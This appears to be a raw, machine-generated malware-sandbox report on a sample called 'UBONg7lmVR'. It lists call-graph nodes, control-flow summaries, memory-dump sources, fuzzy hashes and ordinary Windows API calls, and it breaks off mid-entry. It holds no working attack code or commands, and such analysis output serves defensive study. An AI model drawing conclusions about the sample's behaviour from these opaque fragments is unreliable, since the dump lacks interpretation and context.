64165 3f8c26d 64164->64165 64165->64155 64169 3f8c2b4 64168->64169 64171 3f8c2d9 64169->64171 64176 3f8bd18 64169->64176 64171->64163 64173 3f8c2a0 64172->64173 64174 3f8bd18 LoadLibraryExW 64173->64174 64175 3f8c2d9 64173->64175 64174->64175 64175->64163 64178 3f8c460 LoadLibraryExW 64176->64178 64179 3f8c4d9 64178->64179 64179->64171 64181 3f8e175 64180->64181 64182 3f8e1af 64181->64182 64184 3f8df90 64181->64184 64182->64146 64185 3f8df9b 64184->64185 64186 3f8eac0 64185->64186 64188 3f8e0ac 64185->64188 64189 3f8e0b7 64188->64189 64190 3f88470 19 API calls 64189->64190 64191 3f8eb2f 64190->64191 64193 3f8efb0 17 API calls 64191->64193 64192 3f8eb3e 64192->64186 64193->64192 64195 99b81df 64194->64195 64197 3f88470 19 API calls 64195->64197 64198 3f89970 19 API calls 64195->64198 64196 99bab14 64196->64063 64197->64196 64198->64196 64201 99baec8 64199->64201 64200 99b7f08 15 API calls 64202 99baf6b 64200->64202 64201->64200 64204 99baec8 64203->64204 64205 99b7f08 15 API calls 64204->64205 64206 99baf6b 64205->64206 64208 99bd024 64207->64208 64209 99bd02b 64207->64209 64208->64072 64214 99bd07e 64209->64214 64227 99bb304 64209->64227 64212 99bb304 16 API calls 64213 99bd052 64212->64213 64213->64214 64233 99bd509 64213->64233 64243 99bd510 64213->64243 64214->64072 64218 99bd024 64217->64218 64219 99bd02b 64217->64219 64218->64072 64220 99bb304 16 API calls 64219->64220 64224 99bd07e 64219->64224 64221 99bd048 64220->64221 64222 99bb304 16 API calls 64221->64222 64223 99bd052 64222->64223 64223->64224 64225 99bd509 DrawTextExW 64223->64225 64226 99bd510 DrawTextExW 64223->64226 64224->64072 64225->64224 64226->64224 64228 99bb30f 64227->64228 64229 99bd35a 64228->64229 64230 99bd36f GetCurrentThreadId 64228->64230 64231 99b5450 15 API calls 64229->64231 64232 99bd048 64230->64232 64231->64232 64232->64212 64234 99bd52d 64233->64234 64235 99bd51d 64233->64235 64241 99bd509 DrawTextExW 64234->64241 64242 99bd510 DrawTextExW 64234->64242 64235->64234 64237 99bd53b 64235->64237 64236 99bd537 64236->64214 64238 99bd653 64237->64238 64253 99f63d0 64237->64253 64257 99f63c0 64237->64257 64238->64214 64241->64236 64242->64236 64244 99bd52d 64243->64244 64245 99bd51d 64243->64245 64251 99bd509 DrawTextExW 64244->64251 64252 99bd510 DrawTextExW 64244->64252 64245->64244 64247 99bd53b 64245->64247 64246 99bd537 64246->64214 64248 99bd653 64247->64248 64249 99f63d0 DrawTextExW 64247->64249 64250 99f63c0 DrawTextExW 64247->64250 64248->64214 64249->64248 64250->64248 64251->64246 64252->64246 64254 99f63dd 64253->64254 64255 99f63f3 64254->64255 64256 99f5ec4 DrawTextExW 64254->64256 64255->64238 64256->64255 64258 99f63dd 64257->64258 64259 99f63f3 64258->64259 64260 99f5ec4 DrawTextExW 64258->64260 64259->64238 64260->64259 64262 99ff0d0 64261->64262 64263 99f5ec4 DrawTextExW 64262->64263 64264 99ff10c 64263->64264 64264->64106 64266 99ff0d0 64265->64266 64267 99f5ec4 DrawTextExW 64266->64267 64268 99ff10c 64267->64268 64268->64106 64270 99ff12f 64269->64270 64271 99ff0cc 64269->64271 64270->64106 64272 99f5ec4 DrawTextExW 64271->64272 64273 99ff10c 64272->64273 64273->64106 64274 3f8e280 64275 3f8e2c6 GetCurrentProcess 64274->64275 64277 3f8e318 GetCurrentThread 64275->64277 64278 3f8e311 64275->64278 64279 3f8e34e 64277->64279 64280 3f8e355 GetCurrentProcess 64277->64280 64278->64277 64279->64280 64281 3f8e38b GetCurrentThreadId 64280->64281 64283 3f8e3e4 64281->64283 63757 154117d8 63758 15411832 63757->63758 63759 154118b7 GetCurrentThreadId 63758->63759 63760 154118e7 63758->63760 63759->63760 64284 7d2fa28 64285 7d2fa38 64284->64285 64286 7d29e74 SendMessageW 64285->64286 64287 7d2fa49 64286->64287 64288 99b01e0 64290 99b01fc 64288->64290 64289 99b024c 64291 99b0251 64290->64291 64292 99b02f0 KiUserCallbackDispatcher 64290->64292 64293 99b02e0 KiUserCallbackDispatcher 64290->64293 64292->64289 64293->64289

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 99b83cd-99b842b 299 99b8435-99b8439 call 99b7e58 294->299 301 99b843e-99b8449 299->301 303 99b8453-99b8457 call 99b7e68 301->303 305 99b845c-99b8485 call 99b7e78 303->305 311 99b848f-99b8493 call 99b7e88 305->311 313 99b8498-99b84fd call 99b7e88 call 99b7e98 call 99b7ea8 311->313 327 99b8507-99b850b call 99b7eb8 313->327 329 99b8510-99b85b4 call 99b7eb8 call 99b7e78 call 99b7e68 327->329 348 99b85bb-99b85c8 call 99b7ec8 329->348 350 99b85cd-99b85d5 call 99b7ed8 348->350 352 99b85da-99b85e4 350->352 590 99b85e7 call 99bcc4f 352->590 591 99b85e7 call 99bcc60 352->591 353 99b85ea-99b86b5 call 99b7ed8 call 99b7ee8 call 99b7ef8 call 99b7f08 call 99b7f18 call 99b7f28 367 99b86be-99b86d1 353->367 580 99b86d4 call 99f5708 367->580 581 99b86d4 call 99f5710 367->581 368 99b86d7-99b86fc call 99b7ed8 * 2 373 99b8701-99b870b 368->373 588 99b870e call 99f5ddf 373->588 589 99b870e call 99f5dc4 373->589 374 99b8711-99b8839 call 99b7ed8 * 3 call 99b7f38 call 99b7ef8 call 99b7f48 call 99b7f18 call 99b7f58 394 99b883e-99b884c 374->394 584 99b884f call 99b9a42 394->584 585 99b884f call 99b9a50 394->585 395 99b8851-99b8878 call 99b7f68 399 99b887a-99b8880 395->399 400 99b8890-99b88dd call 99b7f78 call 99b7ee8 call 99b7ef8 395->400 401 99b8882 399->401 402 99b8884-99b8886 399->402 408 99b88e2-99b8911 call 99b7f18 400->408 401->400 402->400 410 99b8916-99b8941 call 99b7f88 call 99b7f98 call 99b7fa8 408->410 416 99b8946-99b8953 410->416 578 99b8956 call 99fae88 416->578 579 99b8956 call 99fae51 416->579 417 99b8959-99b8984 call 99b7fb8 420 99b8989-99b8990 417->420 582 99b8993 call 99fedd0 420->582 583 99b8993 call 99fedc0 420->583 421 99b8996-99b8d96 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7fb8 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7ed8 * 3 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7fd8 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7fe8 478 99b8da2-99b8db7 421->478 479 99b8dbd-99b8fdf call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7ff8 call 99b8008 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7ff8 call 99b8008 478->479 511 99b8fe4-99b8ff1 479->511 592 99b8ff4 call 7d22240 511->592 593 99b8ff4 call 7d22231 511->593 512 99b8ff7-99b921d call 99b7f78 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b8018 call 99b7f88 call 99b7f98 call 99b7f38 call 99b7ef8 call 99b7f48 call 99b7f18 call 99b7f58 call 99b8028 543 99b9229-99b923d call 99b8038 512->543 545 99b9242-99b9323 call 99b8048 call 99b8058 call 99b7ed8 call 99b8068 call 99b8078 call 99b8088 call 99b7ef8 call 99b8098 543->545 567 99b9328-99b9330 545->567 576 99b9332 call 99f4f90 567->576 577 99b9332 call 99f4f80 567->577 568 99b9337-99b933f 569 99b9346-99b934e call 99b80a8 568->569 571 99b9353-99b936e 569->571 574 99b937a-99b937c 571->574 586 99b937e call 99f4f90 574->586 587 99b937e call 99f4f80 574->587 575 99b9383-99b938a 576->568 577->568 578->417 579->417 580->368 581->368 582->421 583->421 584->395 585->395 586->575 587->575 588->374 589->374 590->353 591->353 592->512 593->512
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($2$K$K$X$i
                                                  • API String ID: 0-301893868
                                                  • Opcode ID: 2acf934de26575beee069bc544ac10b1b2f5c78df296ef92b59f9310bf1c7e57
                                                  • Instruction ID: 3c0a798b1f3cb515d2624f9be71b755f1cf24b095fdda2cc7fb5c6f3a863f52b
                                                  • Opcode Fuzzy Hash: 2acf934de26575beee069bc544ac10b1b2f5c78df296ef92b59f9310bf1c7e57
                                                  • Instruction Fuzzy Hash: C0A20634A10704CFC715EF74C854BD9B7B2BFCA305F518AA9D14A6B360DB76A986CB40

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 594 99b83e8-99b85e4 call 99b7e58 call 99b7e68 call 99b7e78 call 99b7e88 * 2 call 99b7e98 call 99b7ea8 call 99b7eb8 * 2 call 99b7e78 call 99b7e68 call 99b7ec8 call 99b7ed8 883 99b85e7 call 99bcc4f 594->883 884 99b85e7 call 99bcc60 594->884 652 99b85ea-99b86d1 call 99b7ed8 call 99b7ee8 call 99b7ef8 call 99b7f08 call 99b7f18 call 99b7f28 891 99b86d4 call 99f5708 652->891 892 99b86d4 call 99f5710 652->892 667 99b86d7-99b870b call 99b7ed8 * 2 881 99b870e call 99f5ddf 667->881 882 99b870e call 99f5dc4 667->882 673 99b8711-99b884c call 99b7ed8 * 3 call 99b7f38 call 99b7ef8 call 99b7f48 call 99b7f18 call 99b7f58 877 99b884f call 99b9a42 673->877 878 99b884f call 99b9a50 673->878 694 99b8851-99b8878 call 99b7f68 698 99b887a-99b8880 694->698 699 99b8890-99b8953 call 99b7f78 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f88 call 99b7f98 call 99b7fa8 694->699 700 99b8882 698->700 701 99b8884-99b8886 698->701 889 99b8956 call 99fae88 699->889 890 99b8956 call 99fae51 699->890 700->699 701->699 716 99b8959-99b8990 call 99b7fb8 875 99b8993 call 99fedd0 716->875 876 99b8993 call 99fedc0 716->876 720 99b8996-99b8ff1 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7fb8 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7ed8 * 3 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7fd8 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7fe8 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7ff8 call 99b8008 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b7f28 call 99b7ff8 call 99b8008 885 99b8ff4 call 7d22240 720->885 886 99b8ff4 call 7d22231 720->886 811 99b8ff7-99b9330 call 99b7f78 call 99b7ee8 call 99b7ef8 call 99b7f18 call 99b8018 call 99b7f88 call 99b7f98 call 99b7f38 call 99b7ef8 call 99b7f48 call 99b7f18 call 99b7f58 call 99b8028 call 99b8038 call 99b8048 call 99b8058 call 99b7ed8 call 99b8068 call 99b8078 call 99b8088 call 99b7ef8 call 99b8098 887 99b9332 call 99f4f90 811->887 888 99b9332 call 99f4f80 811->888 867 99b9337-99b937c call 99b80a8 879 99b937e call 99f4f90 867->879 880 99b937e call 99f4f80 867->880 874 99b9383-99b938a 875->720 876->720 877->694 878->694 879->874 880->874 881->673 882->673 883->652 884->652 885->811 886->811 887->867 888->867 889->716 890->716 891->667 892->667
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($2$K$K$X$i
                                                  • API String ID: 0-301893868
                                                  • Opcode ID: 88d02f0fd9147be34a1725e7a65c5d1cfe2b6a77b708d10f2f0384571aabc503
                                                  • Instruction ID: f98dcd9f110a802d6d47e1006e246a799013b5b60095fd7cf04e3a035d3fbad6
                                                  • Opcode Fuzzy Hash: 88d02f0fd9147be34a1725e7a65c5d1cfe2b6a77b708d10f2f0384571aabc503
                                                  • Instruction Fuzzy Hash: 3BA2F634A10704CFC715EF74C854BDAB7B2BFCA305F509AA9D14A6B360DB76A986CB40

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1460 154183c8-1541842b 1461 1541845a-15418478 1460->1461 1462 1541842d-15418457 1460->1462 1467 15418481-154184b8 1461->1467 1468 1541847a-1541847c 1461->1468 1462->1461 1472 154188e9 1467->1472 1473 154184be-154184d2 1467->1473 1469 1541893a-1541894f 1468->1469 1476 154188ee-15418904 1472->1476 1474 15418501-15418520 1473->1474 1475 154184d4-154184fe 1473->1475 1482 15418522-15418528 1474->1482 1483 15418538-1541853a 1474->1483 1475->1474 1476->1469 1484 1541852a 1482->1484 1485 1541852c-1541852e 1482->1485 1486 15418559-15418562 1483->1486 1487 1541853c-15418554 1483->1487 1484->1483 1485->1483 1489 1541856a-15418571 1486->1489 1487->1476 1490 15418573-15418579 1489->1490 1491 1541857b-15418582 1489->1491 1492 1541858f-154185ac call 15417f3c 1490->1492 1493 15418584-1541858a 1491->1493 1494 1541858c 1491->1494 1497 15418701-15418705 1492->1497 1498 154185b2-154185b9 1492->1498 1493->1492 1494->1492 1500 154188d4-154188e7 1497->1500 1501 1541870b-1541870f 1497->1501 1498->1472 1499 154185bf-154185fc 1498->1499 1509 15418602-15418607 1499->1509 1510 154188ca-154188ce 1499->1510 1500->1476 1502 15418711-15418724 1501->1502 1503 15418729-15418732 1501->1503 1502->1476 1505 15418761-15418768 1503->1505 1506 15418734-1541875e 1503->1506 1507 15418807-1541881c 1505->1507 1508 1541876e-15418775 1505->1508 1506->1505 1507->1510 1520 15418822-15418824 1507->1520 1511 154187a4-154187c6 1508->1511 1512 15418777-154187a1 1508->1512 1513 15418639-1541864e call 15417f60 1509->1513 1514 15418609-15418617 call 15417f48 1509->1514 1510->1489 1510->1500 1511->1507 1548 154187c8-154187d2 1511->1548 1512->1511 1524 15418653-15418657 1513->1524 1514->1513 1529 15418619-15418632 call 15417f54 1514->1529 1527 15418871-1541888e call 15417f3c 1520->1527 1528 15418826-1541885f 1520->1528 1525 15418659-1541866b call 15417f6c 1524->1525 1526 154186c8-154186d5 1524->1526 1553 154186ab-154186c3 1525->1553 1554 1541866d-1541869d 1525->1554 1526->1510 1546 154186db-154186e5 call 15417f7c 1526->1546 1527->1510 1545 15418890-154188bc WaitMessage 1527->1545 1542 15418861-15418867 1528->1542 1543 15418868-1541886f 1528->1543 1538 15418637 1529->1538 1538->1524 1542->1543 1543->1510 1550 154188c3 1545->1550 1551 154188be 1545->1551 1556 154186f4-154186fc call 15417f94 1546->1556 1557 154186e7-154186ea call 15417f88 1546->1557 1561 154187d4-154187da 1548->1561 1562 154187ea-15418805 1548->1562 1550->1510 1551->1550 1553->1476 1568 154186a4 1554->1568 1569 1541869f 1554->1569 1556->1510 1564 154186ef 1557->1564 1566 154187dc 1561->1566 1567 154187de-154187e0 1561->1567 1562->1507 1562->1548 1564->1510 1566->1562 1567->1562 1568->1553 1569->1568
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  • Opcode ID: 472b2cbd08c076a3e9cf01042a0195bbff7c915f1e8e74bc41bd187db573b3a1
                                                  • Instruction ID: c83e6a97ad1a407ee74699f0e9f0a1d04e0def363e47713ef7e5c60576896116
                                                  • Opcode Fuzzy Hash: 472b2cbd08c076a3e9cf01042a0195bbff7c915f1e8e74bc41bd187db573b3a1
                                                  • Instruction Fuzzy Hash: FAF12974A00209CFEB04DFA9C994B9DBBF2BF48314F158559D805AF3A5DB74E946CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29e4c7b690d1bd72483ffbd4e6f16cea71819ca8ce294bd4ac5dbb62bb704d72
                                                  • Instruction ID: 7f11abb048484f273cb44edd16825ce6984fbe0493faab0f47e5827221cda941
                                                  • Opcode Fuzzy Hash: 29e4c7b690d1bd72483ffbd4e6f16cea71819ca8ce294bd4ac5dbb62bb704d72
                                                  • Instruction Fuzzy Hash: 49C18DB0E002658FCB15CF65D880B9DFBB2EF99304F14C1AAD84AAB255DB30D956DF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e2dc7c8c94b704dbc2ff4ea5c5228934175cbf71a78f41d1a87b6ddd0d843b1
                                                  • Instruction ID: fcf065379169dde52d62aa5bc72720f1bed06b49de38a96a0291f430f8f986ad
                                                  • Opcode Fuzzy Hash: 9e2dc7c8c94b704dbc2ff4ea5c5228934175cbf71a78f41d1a87b6ddd0d843b1
                                                  • Instruction Fuzzy Hash: BFD11435D1175ACACB01EB68D9907A9B7B1EFD5300F10CB9AD1097B260EB706AC8CF81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0865f40966205596a3812cacd968da71809934f94c8d395d7df9decc5f4082d7
                                                  • Instruction ID: dd85f6d1ce1c56a91dd998598fc082183bd4af1903b41b63d726ee6bd188ffc9
                                                  • Opcode Fuzzy Hash: 0865f40966205596a3812cacd968da71809934f94c8d395d7df9decc5f4082d7
                                                  • Instruction Fuzzy Hash: E1D1F435D1175ACACB01EB64D9907A9B7B1EF95300F10C79AD1097B260EB70AAC9CF91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 893 3f8e280-3f8e30f GetCurrentProcess 897 3f8e318-3f8e34c GetCurrentThread 893->897 898 3f8e311-3f8e317 893->898 899 3f8e34e-3f8e354 897->899 900 3f8e355-3f8e389 GetCurrentProcess 897->900 898->897 899->900 901 3f8e38b-3f8e391 900->901 902 3f8e392-3f8e3aa 900->902 901->902 906 3f8e3b3-3f8e3e2 GetCurrentThreadId 902->906 907 3f8e3eb-3f8e44d 906->907 908 3f8e3e4-3f8e3ea 906->908 908->907
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 03F8E2FE
                                                  • GetCurrentThread.KERNEL32 ref: 03F8E33B
                                                  • GetCurrentProcess.KERNEL32 ref: 03F8E378
                                                  • GetCurrentThreadId.KERNEL32 ref: 03F8E3D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 1f60ec02ff3a8692f553a7d7585979abbbdca33f14f76a29a04ad67d1c24a85e
                                                  • Instruction ID: a9d0004ed7da8c4e3b8ca0fef7ea2ccba8285b0010e1813225c3be55371b7493
                                                  • Opcode Fuzzy Hash: 1f60ec02ff3a8692f553a7d7585979abbbdca33f14f76a29a04ad67d1c24a85e
                                                  • Instruction Fuzzy Hash: D25178B09003098FDB14DFA9C948BAEBFF1EF48314F248469E009A7360DB34A945CF65
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa8cf6735f221a1027638170cf29541e3e3dd79a10a094a3f1f59a387db9c273
                                                  • Instruction ID: b52d48b648c00419875cb81570d98ab7dee3312b2ad30f383a260f45a324d1af
                                                  • Opcode Fuzzy Hash: fa8cf6735f221a1027638170cf29541e3e3dd79a10a094a3f1f59a387db9c273
                                                  • Instruction Fuzzy Hash: 17226D34E00105CFDB14DF98C684AFEB7B6EB85350F258056E915AF366C73DA881DB92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1225 99b02f0-99b0309 1226 99b030f-99b0313 1225->1226 1227 99b038c-99b038f 1225->1227 1228 99b0390-99b03fe 1226->1228 1229 99b0315-99b032f 1226->1229 1249 99b04b8-99b04bd 1228->1249 1250 99b0404-99b042a 1228->1250 1234 99b0343-99b0365 1229->1234 1235 99b0331-99b0338 1229->1235 1242 99b036c-99b036e 1234->1242 1235->1234 1237 99b033a-99b033c 1235->1237 1237->1234 1243 99b0370-99b037c 1242->1243 1244 99b0385 1242->1244 1243->1244 1248 99b037e 1243->1248 1244->1227 1248->1244 1254 99b043a-99b043f 1250->1254 1255 99b042c-99b0437 1250->1255 1256 99b0448-99b0450 1254->1256 1257 99b0441 1254->1257 1255->1254 1258 99b0452-99b046b 1256->1258 1259 99b0475-99b04ae KiUserCallbackDispatcher 1256->1259 1263 99b0443 call 7d2ddb0 1257->1263 1264 99b0443 call 7d2dda0 1257->1264 1258->1259 1259->1249 1263->1256 1264->1256
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,06CC4108,05D4E5AC,?,00000000), ref: 099B04A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID: Hp
                                                  • API String ID: 2492992576-671740992
                                                  • Opcode ID: 5bc854f4ddc333ca21b7c4282c1ed7217cbe0b461dd966ac6b08dfc5ba26cb32
                                                  • Instruction ID: a0a3881038ce50dc12e78ad09e5307ac39295f4e560459a695efaca654089545
                                                  • Opcode Fuzzy Hash: 5bc854f4ddc333ca21b7c4282c1ed7217cbe0b461dd966ac6b08dfc5ba26cb32
                                                  • Instruction Fuzzy Hash: BE518B353006118FDB18EF29C858B2E77EBAFC9A04B154469E046CF7A5CF68EC06C7A1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1265 99f1c60-99f1cc2 call 99f0ff4 1271 99f1d28-99f1d54 1265->1271 1272 99f1cc4-99f1cc6 1265->1272 1274 99f1d5b-99f1d63 1271->1274 1273 99f1ccc-99f1cd8 1272->1273 1272->1274 1278 99f1cde-99f1d19 call 99f1000 1273->1278 1279 99f1d6a-99f1ea5 1273->1279 1274->1279 1290 99f1d1e-99f1d27 1278->1290 1298 99f1eab-99f1eb9 1279->1298 1299 99f1ebb-99f1ec1 1298->1299 1300 99f1ec2-99f1f08 1298->1300 1299->1300 1305 99f1f0a-99f1f0d 1300->1305 1306 99f1f15 1300->1306 1305->1306 1307 99f1f16 1306->1307 1307->1307
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hp$Hp
                                                  • API String ID: 0-2951427863
                                                  • Opcode ID: 462e45dddbd6cafdcf8cd78e689616eb962c3288f0e4760256ea34caf6b3d7d0
                                                  • Instruction ID: e9ee14630800dfb983a762b43a791115eacb27ec77113c52d74ccffa7bf176b2
                                                  • Opcode Fuzzy Hash: 462e45dddbd6cafdcf8cd78e689616eb962c3288f0e4760256ea34caf6b3d7d0
                                                  • Instruction Fuzzy Hash: E2818D74E003198FDB14DFA9C8946AEBBF2FF88300F24852AE505EB350DB749905CBA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1572 154117d8-1541183c 1575 15411842-1541185a 1572->1575 1576 15411aca-15411b96 1572->1576 1581 15411872-15411874 1575->1581 1582 1541185c-15411862 1575->1582 1601 15411b98-15411b9e 1576->1601 1602 15411b9f-15411bb3 1576->1602 1585 15411884-154118af 1581->1585 1586 15411876-1541187d 1581->1586 1583 15411864 1582->1583 1584 15411866-15411868 1582->1584 1583->1581 1584->1581 1594 154118b7-154118e5 GetCurrentThreadId 1585->1594 1586->1585 1595 154118e7-154118ed 1594->1595 1596 154118ee-154118f7 1594->1596 1595->1596 1597 154118f9-154118ff 1596->1597 1598 15411908-1541190e 1596->1598 1597->1598 1600 15411901 1597->1600 1603 15411910-15411915 1598->1603 1604 15411917-1541195d 1598->1604 1600->1598 1601->1602 1603->1604 1611 1541197d-15411998 1604->1611 1612 1541195f-15411975 1604->1612 1615 154119a2-154119a3 1611->1615 1616 1541199a 1611->1616 1612->1611 1615->1576 1616->1615
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 154118D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 40a7e73a36cac23bc28b83c0b474eeaf52b15c088e1be37a26750fd5914c60a1
                                                  • Instruction ID: 12114e83b8c25b95eb764e2050c8ae6a50eacfd93720ca593029eb3f0a5c03aa
                                                  • Opcode Fuzzy Hash: 40a7e73a36cac23bc28b83c0b474eeaf52b15c088e1be37a26750fd5914c60a1
                                                  • Instruction Fuzzy Hash: 6C816970E043598FCB14DFA9C844BAEBFF6BF89310F14946AD816AB350DB74A945CB60
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07D20AF5,?,?), ref: 07D20BA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
                                                  • Opcode ID: 33ed54166f7e459473fcefbc6b2209e0b5eb637b41358f14deb851b1ac1d21ff
                                                  • Instruction ID: 0207cfbbb3a9247dd50e0d69515ffce415dd926f19e6337c85a12106eeba4619
                                                  • Opcode Fuzzy Hash: 33ed54166f7e459473fcefbc6b2209e0b5eb637b41358f14deb851b1ac1d21ff
                                                  • Instruction Fuzzy Hash: 4D91167590021ACFCF11DF98D8809DDFBB1FF98314F258656E918AB221D730AA96CB90
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 03F8C25E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4505255314.0000000003F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 03F80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3f80000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 118e957d998ca96e1571580f646d35744cde8721cc46b37e173a3aa93f40bf2e
                                                  • Instruction ID: 89520ccbbffe6d13e16dfb5af22b7d83d58badff22a59215af1637e0442a2c95
                                                  • Opcode Fuzzy Hash: 118e957d998ca96e1571580f646d35744cde8721cc46b37e173a3aa93f40bf2e
                                                  • Instruction Fuzzy Hash: 6E812470A00B068FD728DF69D45075ABBF6FF88304F14892DD586DBA50DB35E945CBA0
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 154118D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 5bf53329119d7c5b14e408ebb3b8ffdb292ea397c1da17002d3ac61e82533738
